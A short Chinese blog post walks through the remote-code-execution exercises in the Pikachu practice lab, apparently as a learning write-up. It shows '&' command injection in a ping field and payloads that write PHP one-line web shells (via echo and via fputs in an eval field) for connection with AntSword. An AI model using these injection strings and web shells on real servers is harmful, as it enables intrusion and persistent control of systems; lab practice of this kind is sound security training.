技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
吴声子夜歌
11 分钟前
Redis 3.x——集群运维
运维·数据库·redis
是个西兰花
1 小时前
Linux:深入解析Linux线程原理与实现
linux·运维·c++·线程·互斥锁
云泽808
1 小时前
飞算 JavaAI 实战:如何自动化生成全流程追溯系统
运维·自动化·vibe coding·飞算javaai·飞算java ai炫技赛
运维大师
1 小时前
【Linux运维极简教程】07-磁盘管理与LVM
linux·运维·服务器
乖巧的妹子
1 小时前
刷题总结知识
linux·服务器·windows
超防局
1 小时前
网络安全渗透测试常用工具详解
网络·安全·web安全
拳里剑气
2 小时前
Linux:基础IO
linux·运维·服务器·io
峥嵘life
2 小时前
Andorid 打开热点,关闭有线网,ifconfig卡死分析解决
java·服务器·网络
ruxshui
3 小时前
数据运维生产故障案例笔记
大数据·运维
三844
3 小时前
基本Linux命令总结
linux·运维·服务器
热门推荐
012026年7月AI圈大地震:GPT-5.6被政府限制、Claude入驻Slack、Anthropic自研芯片02GitHub 镜像站点03AI科技热点日报 | 2026年07月01日04幻兽帕鲁 - 服务器管理员权限与 GM 命令完全指南05AI 编程 IDE 全景解析 2026:Agent 全面接管开发链路06国内可直接用、免费额度/永久免费的大模型API清单(含 SiliconFlow、火山、阿里、智谱、百度、Kimi、DeepSeek、DMXAPI 等)072026 国产 AI 大模型横评:DeepSeek、通义千问、Kimi、文心一言、星火、豆包谁更能打?082026年AI技术突破与产业落地全景:从GPT-5到多模态智能体的新纪元09Codex 下载安装指南:Windows 和 macOS 官方版下载102026 年 AI 大模型 & AI 编程工具实战全总结